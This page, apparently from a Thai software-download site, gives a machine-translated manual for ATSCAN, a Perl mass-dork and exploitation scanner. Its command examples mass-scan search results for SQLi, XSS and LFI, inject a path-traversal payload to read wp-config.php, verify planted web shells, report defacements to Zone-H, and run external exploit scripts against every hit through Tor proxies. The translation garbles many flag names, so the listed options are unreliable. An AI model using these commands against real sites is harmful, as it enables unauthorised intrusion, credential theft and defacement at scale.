หน้าแรก>แหล่งข้อมูลการสร้างเว็บไซต์>ข้อมูลเว็บไซต์
ดาวน์โหลด

เครื่องสแกน Atscan

สแกนเนอร์ Search / Dork / Exploitation ขั้นสูง

เทคโนโลยี Alisam จะไม่รับผิดชอบต่อการใช้ในทางที่ผิดความเสียหายที่เกิดจากสคริปต์นี้หรือการโจมตีเป้าหมายโดยไม่ได้รับความยินยอมร่วมกันก่อนหน้านี้! เป็นความรับผิดชอบของคุณที่จะปฏิบัติตามกฎหมาย!
ชื่อรหัส: 4N0N4T
ผู้เขียน: Ali mehdioui
กลุ่ม: alisam@technology
คำอธิบาย:

●เครื่องยนต์: [Google APIS Cache] Bing ถาม Yandex Sogou Exalead Shodan
●การค้นหามวล dork
●สแกนทันที
●การแสวงประโยชน์จากมวลชน
●ใช้พร็อกซี
●ตัวแทนผู้ใช้แบบสุ่ม
●เครื่องยนต์สุ่ม
●การดำเนินการคำสั่ง mass extern
●การค้นหาและปัญหาการค้นหา
●เครื่องสแกน XSS / SQLI / LFI / AFD
●กรองไซต์ WordPress & Joomla
●ธีม WordPress และการตรวจจับปลั๊กอิน
●ค้นหาหน้าผู้ดูแลระบบ
●ถอดรหัส / เข้ารหัส Base64 / MD5

●สแกนพอร์ต
●รวบรวม IPS
●รวบรวมอีเมล
●ตรวจจับข้อผิดพลาดอัตโนมัติ
●การตรวจจับอัตโนมัติแบบฟอร์ม
●ตรวจจับอัตโนมัติ CMS
●โพสต์ข้อมูล
● Repeater ลำดับอัตโนมัติ
●การตรวจสอบความถูกต้อง
●โพสต์และรับเมธอด
●การแปล IP
●ปัญหาและใช้ประโยชน์จากการค้นหา
●อินเทอร์เฟซแบบโต้ตอบและปกติ
●และอื่น ๆ ...

★ห้องสมุดที่จะติดตั้ง:
ต้องใช้ Perl
ทำงานในทุกแพลตฟอร์ม ไม่ลงรอยกันใน Blackarch และ Dracos Linux
ดาวน์โหลด:
● git clone https://github.com/alisamtechnology/atscan
●ลิงก์โดยตรง: https://github.com/alisamtechnology/atscan
การอนุญาต:
CD ATSCAN
chmod +x ./atscan.pl
การติดตั้ง:
chmod +x ./install.sh
./install.sh
การดำเนินการ:
การดำเนินการแบบพกพา: Perl ./atscan.pl
การดำเนินการเครื่องมือที่ติดตั้ง: atscan
เมนู: แอปพลิเคชัน> การวิเคราะห์เว็บแอปพลิเคชัน> atscan
เครื่องมือซ่อม:
Atscan -repair
เครื่องมือถอนการติดตั้ง:
atscan -การติดตั้ง
คำสั่ง:
-help / -h ช่วย.
-พร็อกซี่ ตั้งค่าพร็อกซีสำหรับการสแกน [ex: -proxy "Socks4: // localhost: 9050"]
ตั้งค่าพร็อกซี [ex: -proxy "http://12.45.44.2:8080"]
ตั้งค่ารายการพร็อกซี [ex: -ไฟล์พร็อกซี]
-การเสนอราคา พร็อกซีแบบสุ่ม [ex: -ไฟล์ prandom] หรือ -prandom "ถุงเท้า: // localhost: 9050"]
-มอเตอร์ / -m bing Google ถาม Yandex Sogou exalead googleapis googlecache หรือทั้งหมด
-Aapikey apikey
-CX googleapis id
-มดลูก สุ่มของเครื่องยนต์ที่ได้รับ
-แบรนด์ สุ่มตัวแทนทั้งหมด disponibles
-เฟรดค์ ความถี่เวลาสุ่ม (เป็นวินาที)
--เวลา กำหนดเวลาเบราว์เซอร์ออก
-dork / -d Dork to Search [Ex: House [อื่น ๆ ] รถยนต์ [อื่น ๆ ] โรงแรม]
-เป้าหมาย / -t เป้า
-ระดับ / -l ระดับสแกน (จำนวนหน้าผลลัพธ์ที่จะสแกน)
--โซน ประเทศเครื่องมือค้นหา
-Param / -p ตั้งค่าพารามิเตอร์ทดสอบ Ex: ID, CAT, Product_id
-SAVE / -S เอาต์พุต
--แหล่งที่มา ไฟล์เอาต์พุต HTML
-Bugtraq การหาประโยชน์และปัญหาของ Serach
--เนื้อหา เนื้อหาคำขอพิมพ์
--ข้อมูล โพสต์และรับแบบฟอร์ม ดูตัวอย่าง
-vshell ตรวจสอบโดย URL Ex: -host/shell.php หรือไฟล์
--โพสต์ ใช้วิธีการโพสต์
--รับ ใช้วิธีการรับ
-หัวหน้า ตั้งส่วนหัว
-FullHeaders พิมพ์ส่วนหัวคำขอเต็มรูปแบบ
--เจ้าภาพ ชื่อโดเมน [ex: site.com]
-Nobanner ซ่อนแบนเนอร์เครื่องมือ
-เนื้อมาก ผลิตเสียงบี๊บหากพบการสแกนเชิงบวก
-เฟนเดอร์ ผลิตเสียงบี๊บเมื่อกระบวนการสแกนเสร็จสิ้น
-การโน้มน้าว ไม่มีการสแกน verbose
-ปิง โฮสต์ปิง
-จำกัด จำกัด ผลการสแกนบวกสูงสุด
-valid / -v ตรวจสอบโดยสตริงอย่างน้อย 1 คือการจับคู่
-Validall ตรวจสอบสตริงที่กำหนดทั้งหมด
--สถานะ ตรวจสอบโดยสถานะส่วนหัว HTTP
-เซิร์ฟเวอร์ ตรวจสอบโดยเซิร์ฟเวอร์
-finurl รับเป้าหมายที่มีการจับคู่สตริงที่แน่นอน
-การเก็บรักษา รับเป้าหมายด้วยการจับคู่ Regex ที่แน่นอน
-แยกแยะ รับเป้าหมายที่ไม่มีสตริงใน HTML
-ยกเว้น รับเป้าหมายที่ไม่มีสตริงทั้งหมดใน HTML
--มีเอกลักษณ์ รับเป้าหมายด้วยการจับคู่ Dork ที่แน่นอน
--แทนที่ แทนที่สตริงที่แน่นอน
-กลับมาจาก แทนที่จากสตริงเป็นส่วนท้ายของเป้าหมาย
-exp / -e ใช้ประโยชน์/เพย์โหลดลงในเป้าหมายเต็มรูปแบบ
-exphost การใช้ประโยชน์จะถูกเพิ่มลงในโฮสต์
-ส่งออก การใช้ประโยชน์จะถูกเพิ่มลงในโฮสต์ IP
-xss การสแกน XSS
-SQL สแกน SQLI
-LFI การรวมไฟล์ท้องถิ่น
-joomrfi สแกนสำหรับการรวมไฟล์ท้องถิ่น Joomla
--เปลือก Link Shell [Ex: http://www.site.com/shell.txt]
-wpafd สแกนไซต์ WordPress สำหรับการดาวน์โหลดไฟล์โดยพลการ
-นายทหาร รับหน้าผู้ดูแลไซต์
-ทำให้เสีย รับโดเมนย่อยไซต์
--ท่าเรือ ท่าเรือ
-TCP พอร์ต TCP
-UDP พอร์ต UDP
-getLinks รับลิงค์ HTML เป้าหมาย
-WP ไซต์ WordPress
-การคัดค้าน ไซต์ Joomla
-ซิป รับไฟล์ zip
-MD5 แปลงเป็น MD5
-encode64 ENCODE BASE64 String
-DeCode64 ถอดรหัสสตริง Base64
--เป้า จะถูกแทนที่ด้วยเป้าหมายในคำสั่งภายนอก
--เจ้าภาพ จะถูกแทนที่ด้วยโฮสต์ในคำสั่งภายนอก
-โฮสต์ จะถูกแทนที่ด้วยโฮสต์ IP ในคำสั่ง extern
--ท่าเรือ จะถูกแทนที่ด้วย Open Port ในคำสั่ง Extern
-IPS รวบรวม IPS
-geoloc IP geolocalisation
-เรกซ์ คลานเพื่อรับสตริงที่ตรงกัน regex
-การบอกเล่า ลบค่าสตริงออกจาก URL แบบสอบถาม [ex: site.com/index.php?id=string]
-คอมมิวนิสต์ / -c คำสั่งภายนอกเพื่อดำเนินการ
-ป๊อปอัพ ดำเนินการคำสั่ง extern ในหน้าต่างเทอร์มินัลใหม่
-Zoneh อัปโหลดไปยัง Zone-H
-savecookie ไฟล์เอาต์พุตคุกกี้
-Setcookies ไฟล์คุกกี้
--อีเมล รวบรวมอีเมล
Rang (XY) ตัวอย่าง:-exphost "/index.php?id=ran
site.com/index.php?id=1 -> 9
ทำซ้ำ (txt-y) Ex:-exphost "/index.php?id=repeat(../-9)wp-config.php"-Status 200 หรือ -t "site.com/index.php?id=../wp-config.php"
ใน site.com/index.php?id=../wp-config.php จากนั้น site.com/index.php?id=../../wp-config.php 9 ครั้ง
[อื่น] เพื่อแยกค่า Ex: Dork1 [อื่น ๆ ] Dork2 [อื่น ๆ ] Dork3
-googleapi Google APIS
-shodan ค้นหา shodan
--นับ ค้นหา shodan โดยไม่มีผลลัพธ์
--นับ ค้นหา shodan
-DNSREVERSET การค้นหา DNS ย้อนกลับของ Shodan
-dnsresolve shodan resolve dns lookup
-Tokens ตัวกรองสตริงและพารามิเตอร์
-QUATERSEARCH ค้นหาไดเรกทอรีของข้อความค้นหา shodan ที่บันทึกไว้
-คำถาม แสดงรายการข้อความค้นหา shodan ที่บันทึกไว้
-QUATERTAGS แสดงรายการแท็ก shodan ที่ได้รับความนิยมมากที่สุด
-MYIP แสดงรายการบริการทั้งหมดที่ shodan รวบรวมข้อมูล
-บริการ แสดงรายการบริการทั้งหมดที่ shodan รวบรวมข้อมูล
-APINFO ข้อมูลแผน Shodan API ของฉัน
-กีฬา รายการหมายเลขพอร์ตที่ตัวรวบรวมข้อมูลกำลังมองหา
-ผลไม้ แสดงรายการโปรโตคอลทั้งหมดที่สามารถใช้เมื่อทำการสแกนอินเทอร์เน็ตตามความต้องการผ่าน Shodan
-Honeyscore คำนวณคะแนน Honeypot ตั้งแต่ 0 (ไม่ใช่ Honeypot) ถึง 1.0 (เป็น Honeypot) ใน Shodan
-กระเป๋า ด้านการค้นหา Shodan
--อัปเดต ปรับปรุงเครื่องมือ
--ซ่อมแซม การซ่อมแซมหรือการอัปเดตเครื่องมือบังคับ
--เครื่องมือ / -? ข้อมูลเครื่องมือ
-การกำหนด การกำหนดค่าผู้ใช้
-interactive / -i อินเทอร์เฟซโหมดแบบโต้ตอบ
-การติดตั้ง เครื่องมือถอนการติดตั้ง
ตัวอย่าง:
พร็อกซี:
TOR: -Proxy [Proxy] [Ex: -Proxy Socks: // LocalHost: 9050]
พร็อกซี: -Proxy [พร็อกซี] Ex: -Proxy http://12.32.1.5:8080
หรือ -proxy file ex: -proxy my_proxies.txt
สุ่ม:
Proxy แบบสุ่ม: -prandom [ไฟล์พร็อกซี]
เบราว์เซอร์แบบสุ่ม: -แบรนด์
เครื่องยนต์แบบสุ่ม: -MRANDOM [Engines]
ชุดส่วนหัว:
atscan -dork [dork / dorks.txt] -ระดับ [ระดับ] -หัวหน้า "การอนุญาต => 'พื้นฐาน ywrtaw46ywrtaw4', Keep_alive => '1'"
AtScan -t Target -DATA "NAME => ชื่อผู้ใช้, อีเมล => XXXXXX, PASS => XXXXX" -POST -HEADER "AUDUCITIONIZATION => 'พื้นฐาน ywrtaw46ywrtaw4'
เครื่องมือค้นหา:
ค้นหา: atscan -dork [dork] -ระดับ [ระดับ]
ค้นหา: atscan -d [dork] -l [ระดับ] -getLinks
SET Engine: AtScan -Dork [Dork] -ระดับ [ระดับ] -m Bing หรือ Google, ถาม, Yandex หรือทั้งหมด
ตั้งค่าเครื่องยนต์ที่เลือก: atscan -d [dork] -l [ระดับ] -m Google, Bing, ..
ค้นหาด้วย Dorks มากมาย: AtScan -Dork Dork1 [อื่น ๆ ] Dork2 [อื่น ๆ ] Dork3] -ระดับ [ระดับ]
รับไซต์เซิร์ฟเวอร์ WordPress: atscan -t [เป้าหมาย] -WP
ค้นหา + เอาท์พุท: atscan -dork [dorks.txt] -ระดับ [ระดับ] -ประหยัด
ค้นหา + รับอีเมล: atscan -d [dorks.txt] -l [ระดับ] -eMail
ค้นหา + รับอีเมลไซต์: AtScan -เว็บไซต์ Dork: site.com -ระดับ [ระดับ] -Email
ค้นหา + รับ IPS: atscan -dork [dork] -ระดับ [ระดับ] -ไอพี
การแสดงออกปกติ:
regex ใช้: atscan [-dork [dork> / -t [target]]-ระดับ [ระดับ]-Regex [regex]
IP: ((? :(?: 25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?) .) {3} (?: 25 [0-5] | 2 [0-4] [0-9] | [01]
อีเมล: '((([[A-ZA-Z0-9]+_+) | ([A-ZA-Z0-9]+-+) | ([A-ZA-Z0-9]+.+) | ([A-ZA-Z0- 9]+ ++))*[a-za-z0-9]+@(( w+-+) | ( w+.))* w {1,63} . [a-za-z] {2,6}) '
repeater:
atscan -t site.com?index.php?id=ran
atscan -t [target] -exphost "/index.php?id=ran(1-10)" --sql
atscan -t [target]-exphost "/index.php?id=repeat(../-9)wp-config.php"
พอร์ต
atscan -t [IP]-พอร์ต [พอร์ต] [-UDP /-TCP]
atscan -t (เริ่มต้น IP)-(IP End)-พอร์ต [พอร์ต] [-UDP /--TCP]
atscan -t [IP]-พอร์ต (พอร์ตเริ่มต้น)-(ปลายพอร์ต) [-UDP /--TCP]-คอมมิวนิสต์ "คำสั่งภายนอกของคุณ"
เข้ารหัส / ถอดรหัส:
สร้าง MD5: -MD5 [String]
ENCODE BASE64: --ENCODE64 [String]
DECODE BASE64: -DECODE64 [String]
ข้อมูล:
ข้อมูล: atscan -t [เป้าหมาย]-ข้อมูล "field1 => value1, field2 => value2, field3 => value3" [-post /-get /]
Exploit:-exp / exphost-data "field1 => value1, field2 => value2, field3 => value3"-vshell [path shell] -v [String] /-Status [รหัส]
WordList:-ข้อมูล "Field1 => value1, field2 => wordlist:"-vshell [path shell] -v [string] /-status [code] [-post /-get]
คำสั่งภายนอก:
ATSCAN -DORK [DORK / DORKS.TXT] -ระดับ [ระดับ] -คำสั่ง "CURL -V -เป้าหมาย"
ATSCAN -DORK [DORK / DORKS.TXT] -ระดับ [ระดับ] -คำสั่ง "ไฟล์"
ATSCAN -DORK [DORK / DORKS.TXT] -ระดับ [ระดับ] -คำสั่ง "CURL -V -HOST"
ATSCAN -DORK [DORK / DORKS.TXT] -ระดับ [ระดับ] -คำสั่ง "NMAP -SV -P 21,22,80 -Hostip"
atscan -d "ดัชนีของ /lib/scripts/dl-skin.php" -l 2 -m Bing-Command "PHP wp-dl-skin.php-exploit.php-target"
atscan -shodan -การค้นหา [String] -APIKEY [API KEY] -Command [Extern_Command]
การสแกนหลายครั้ง:
atscan -dork [dork> -ระดับ [10] --sql -lfi --wp ..
atscan-dork [dork>-ระดับ [10]-reflace [string => new_string]-exp / exhost [payload] [--sql /-lfi /--wp / ... ]
atscan -t [IP]-ระดับ [10] [--sql /-lfi /--wp / ... ]
atscan -t [เป้าหมาย] [--sql /-lfi /--wp / ... ]
การแปล IP:
atscan -t [ip/target] -geoloc
การตรวจสอบการค้นหา:
atscan -d [dork / dorks.txt] -l [ระดับ] -status [รหัส] / -valid [สตริง / ไฟล์]
atscan -d [dork / dorks.txt] -l [ระดับ] -status [รหัส] / -valid [สตริง / ไฟล์]
atscan -d [dork / dorks.txt] -l [ระดับ] -status [รหัส] / -exclude [สตริง / ไฟล์]
atscan -d [dork / dorks.txt] -l [ระดับ] -finurl [สตริง]
atscan -d [dork / dorks.txt] -l [ระดับ] -Sregex [regex] -valid [String]
atscan -d [dork / dorks.txt] -l [ระดับ] -Regex [regex] -valid [String]
atscan -d [dork / dorks.txt] -l [ระดับ] -Unique
atscan -t [target / targets.txt] [-Status [รหัส] /-valid [String]
atscan -t [target / targets.txt] --vshell [เส้นทางไฟล์]
atscan -d [dork / dorks.txt] -l [ระดับ] -exp / exphost [payload] -Status [รหัส] / -valid [String]
atscan -d [dorks.txt] -l [ระดับ] -reflace [string => new_string] -Status [รหัส] / -valid [String]
atscan -d [dork / dorks.txt] -l [ระดับ] [ -admin / --sql .. ] -Status [รหัส] / -valid [String]
atscan -d [dorks.txt] -l [ระดับ] -reflace [string => new_string] -Status [รหัส] / -valid [String]
atscan -d [dorks.txt] -l [ระดับ] -replacefrom [string => new_string] -status [รหัส] / -valid [สตริง]
atscan -d [dorks.txt] -l [ระดับ] -reflace [string => new_string] -exp / exphost [payload] -status [code] / -valid [String]
atscan -d [dork / dorks.txt] -l [ระดับ] [ --sql / - -shost .. ] -Status [รหัส] / -valid [String]
atscan -t [target / targets.txt] -valid [String] -exclude [String]
Zone-H:
atscan -t [target / targets.txt] -v [string] -zoneh "notifier => -host / index.php"
ค้นหาการหาประโยชน์:
atscan -bugtraq -d [string] -l 1 ex: atscan -bugtraq -d wordpress -l 1
atscan -bugtraq -d file.txt -l 1
atscan -bugtraq -d [string] -l 1 -จำกัด 10
การค้นหา googleapis
atscan -dork [สตริงหรือไฟล์] -l 1 -APIKEY [API KEY] --CX [ID]
atscan -dork [สตริงหรือไฟล์] -l 1 -APIKEY [ปุ่ม API] --CX [ID] -V [String]
AtScan -Dork [String หรือ File] -l 1 -APIKEY [API KEY] --CX [ID] -EXP [Exploit]
atscan -dork [สตริงหรือไฟล์] -l 1 -APIKEY [API KEY] --CX [ID] [APTION ใด ๆ ]
ค้นหา Shodan
atscan -shodan -targget [IP หรือโฮสต์หรือไฟล์] -APIKEY [API Key]
atscan -shodan -dork [สตริงหรือไฟล์] -APIKEY [API KEY]
atscan -shodan -dnsresolve [IP หรือโฮสต์หรือไฟล์] -APIKEY [API Key]
atscan -shodan --dnsrevese [IP หรือโฮสต์หรือไฟล์] -APIKEY [API Key]
atscan -shodan -นับ [การสืบค้นหรือไฟล์] -APIKEY [API KEY]
atscan -shodan -QUARY -APIKEY [API KEY]
AtScan -Shodan -QuerySearch [Query หรือ File] -APIKEY [API KEY]
AtScan -Shodan -QueryTags -APIKEY [API KEY]
atscan -shodan -myip -Apikey [API Key]
atscan -shodan -APINFO -APIKEY [API KEY]
ATSCAN -SHODAN -บริการ -APIKEY [API KEY]
atscan -shodan -พอร์ต -APIKEY [API Key]
atscan -shodan -tokens [สตริงหรือไฟล์] -APIKEY [API KEY]
เครื่องมืออัปเดต:
atscan -อัปเดต
เครื่องมือถอนการติดตั้ง:
atscan -การติดตั้ง
ขอบคุณ:
Blackarch Linux & Dragos OS นักพัฒนาเพื่อรวมโครงการของฉันในระบบของพวกเขา
ขยาย
ข้อมูลเพิ่มเติม
แอปที่เกี่ยวข้อง
แนะนำสำหรับคุณ
ข้อมูลที่เกี่ยวข้อง ทั้งหมด